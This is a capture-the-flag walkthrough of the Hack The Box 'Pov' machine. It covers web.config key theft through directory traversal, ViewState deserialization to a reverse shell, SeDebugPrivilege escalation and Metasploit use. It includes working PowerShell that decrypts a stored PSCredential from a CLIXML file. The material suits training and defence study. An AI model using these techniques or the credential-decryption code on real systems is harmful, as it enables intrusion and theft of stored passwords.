In this post, I would like to share a walkthrough of the Pov machine from Hack The Box.
This machine is rated medium on Hack The Box.
What will you gain from the Pov machine?
For the user flag, you must exploit a local file read and directory traversal vulnerability on the web page to read the ASP.NET machine keys used to protect the VIEWSTATE. Then, use ysoserial.net to craft a malicious serialized .NET payload, signed with those keys, to achieve code execution.
As for the root flag, you need to decrypt a PowerShell credential stored on disk and then abuse SeDebugPrivilege, either through Metasploit or through a PowerShell script (psgetsys.ps1).
Information Gathering on Pov Machine
Once we have started the VPN connection (the connection pack is downloaded from Hack The Box), we can start.
┌─[darknite@parrot]─[~/Documents/htb/pov]
└──╼ $nmap -sV -sC 10.10.11.251 -oA initial
Starting Nmap 7.93 ( https://nmap.org ) at 2024-06-08 06:42 EDT
Nmap scan report for 10.10.11.251
Host is up (0.29s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: pov.htb
|_http-server-header: Microsoft-IIS/10.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 35.08 seconds
┌─[darknite@parrot]─[~/Documents/htb/pov]
└──╼ $
Let's access the website interface.
There is nothing interesting to see on the website interface.
The HTTP responses inspected in Burp Suite do not reveal much either.
Therefore, let's enumerate directories on pov.htb with gobuster.
After that, we can enumerate subdomains (virtual hosts) with the same tool.
The subdomain gives us a potential username on the machine.
We can also read the profile of Stephen Fitz and notice a Download CV button, which leads to the portfolio directory.
Intercepting that download request shows the POST data below:
__EVENTTARGET=download&
__EVENTARGUMENT=&
__VIEWSTATE=DY%2FikU7FyXJZCW0op4Kz6Bgqd4o%2FFtEfEsiowrOTlRKwk96TfCKJt6cwtTy82KRl93H2SNf4FCvmzZuhMaKfKMCbzZg%3D&
__VIEWSTATEGENERATOR=8E0F0FA3&
__EVENTVALIDATION=eGOIJz%2BJA4RbAfYNdIjP%2FXmYDtUaz97UabMUsYu%2Bg8ppRuevK%2FWEufVY9E0M8KqssT57LzrVSlgu%2FzTmjoojoiS270xt9sBSLasZ2CSk2sh4uF3oBk9hMWE%2FILb9D20b1kQDEA%3D%3D&
file=cv.pdf
The file parameter names the requested file, cv.pdf, which we can download to our attacker machine.
In the browser, we can see Stephen's actual CV.
Trying /etc/passwd through the same parameter yields nothing, which is expected: the target runs IIS on Windows, so there is no /etc/passwd to read. Windows and application files are the targets here.
Let's read the application's web.config instead, by placing a traversal path in the file parameter.
It holds a lot of useful information for the next step, in particular the machineKey section with the validationKey and decryptionKey that protect the VIEWSTATE.
Using the ysoserial tool to retrieve a reverse shell on the Pov machine
Let's do some research on ViewStateUserKey; the page linked here helps with the next step.
First, let's try the exploit described on that page from Parrot OS (the machine I use for this box), but sadly we hit an error while executing the command.
We still cannot execute the command, even when trying PowerShell on Linux.
As a last resort, we execute ysoserial.net on a Windows machine.
We also find a contact page that might be vulnerable to the attack.
Let's change the payload by including contact.aspx in the path option.
We copy-paste the generated payload as shown above into the __VIEWSTATE parameter of a request to the contact page.
Let’s start our listener on our attacker’s machine
At last, we receive a reverse shell connection back to us.
The privileges of sfitz are limited to two: SeChangeNotifyPrivilege and SeIncreaseWorkingSetPrivilege.
We find an XML file in sfitz's Documents folder.
The file contains the information shown above: a PowerShell credential (PSCredential) exported as CLIXML, with the password stored as a DPAPI-protected string.
Decrypting it as sfitz, we recover the username and password.
Let's upload RunasCs.exe to the victim machine.
It works like a charm!
We get a shell as that user by executing the command above.
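How the credential in that XML file is recovered, as an added example written for this walkthrough (not code from the original post). A PSCredential written with Export-Clixml keeps the password as a DPAPI blob bound to the account that created it, so any code running as that account on that host can decrypt it, which is exactly the position a shell as sfitz gives us. The demo file name, username and password below are constructed for the example.

```powershell
# Added example (not from the original post). Recover a PSCredential from a
# CLIXML file, two ways: Import-Clixml, and manually from the <SS> element.

function Get-ClixmlCredential {
    # Import the file and unwrap the plaintext. Works only as the user who exported it.
    param([Parameter(Mandatory)][string]$Path)
    try {
        $cred = Import-Clixml -Path $Path
    } catch {
        # Typical failure as another user or on another host:
        # "Key not valid for use in specified state" from the DPAPI unprotect.
        throw "Could not decrypt $Path as $env:USERNAME`: $($_.Exception.Message)"
    }
    [pscustomobject]@{
        UserName = $cred.UserName
        Password = $cred.GetNetworkCredential().Password
    }
}

function Get-ClixmlPasswordManually {
    # The <SS N="Password"> element is the hex-encoded DPAPI blob. ConvertTo-SecureString
    # without -Key/-SecureKey unprotects it with the current user's DPAPI master key.
    param([Parameter(Mandatory)][string]$Path)
    [xml]$doc = Get-Content -Raw -Path $Path
    $hex = $doc.SelectSingleNode("//*[local-name()='SS']").InnerText
    $secure = ConvertTo-SecureString -String $hex
    $bstr = [Runtime.InteropServices.Marshal]::SecureStringToBSTR($secure)
    try   { [Runtime.InteropServices.Marshal]::PtrToStringBSTR($bstr) }
    finally { [Runtime.InteropServices.Marshal]::ZeroFreeBSTR($bstr) }
}

# Constructed demo: create a credential file the way an administrator would, then recover it.
$demoPath = Join-Path $env:TEMP 'connection.xml'            # constructed file name
$secure   = ConvertTo-SecureString 'Demo-Passw0rd!' -AsPlainText -Force
New-Object System.Management.Automation.PSCredential('DEMO\svc', $secure) | Export-Clixml -Path $demoPath

Get-ClixmlCredential -Path $demoPath        # UserName DEMO\svc, Password Demo-Passw0rd!
Get-ClixmlPasswordManually -Path $demoPath  # Demo-Passw0rd!
```

On the target, point either function at the XML file in sfitz's Documents folder. The decryption has to be done from the shell running as sfitz; copying the file to the attacker machine would only yield the opaque DPAPI blob. The recovered username and password are then what RunasCs.exe uses in the step that follows.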
We can read the user flag by typing the “type user.txt” command
Escalate to Root Privileges
First, let's get a clear picture of the privileges held by the user we just accessed.
Let's see the full picture from a PowerShell session (started with the execution policy bypassed).
Let's upload psgetsys.ps1 to the victim machine.
However, an error appears when trying to import the script as a module.
Therefore, let's move the .ps1 file into C:\ProgramData.
It looks promising at this point.
Next, let's upload nc.exe to the victim machine.
We look up the winlogon process with Get-Process, since it runs as SYSTEM and will serve as the parent for the process we spawn.
Executing the command above, however, produces an error.
Let's set up port forwarding from the victim machine.
After a while, the port forwarding works as shown in the screenshot above.
Let's access the machine as alaading using evil-winrm.
It looks promising at this point.
Finally, we receive the reverse shell connection back to us, this time as SYSTEM.
We can read the root flag by typing the “type root.txt” command
Another way to obtain root via Metasploit
Normally I would not even try the Metasploit method, but I do it here for learning's sake.
First, we create a malicious executable with msfvenom.
Let's start our listener in Metasploit (exploit/multi/handler).
We can reuse the previous command, changing only the end of it to point at the malicious file.
Boom! We have successfully obtained a session in Metasploit.
From here, we can follow the same steps as in the method without Metasploit.
Boom! We have the root flag
We can also dump the local password hashes with hashdump.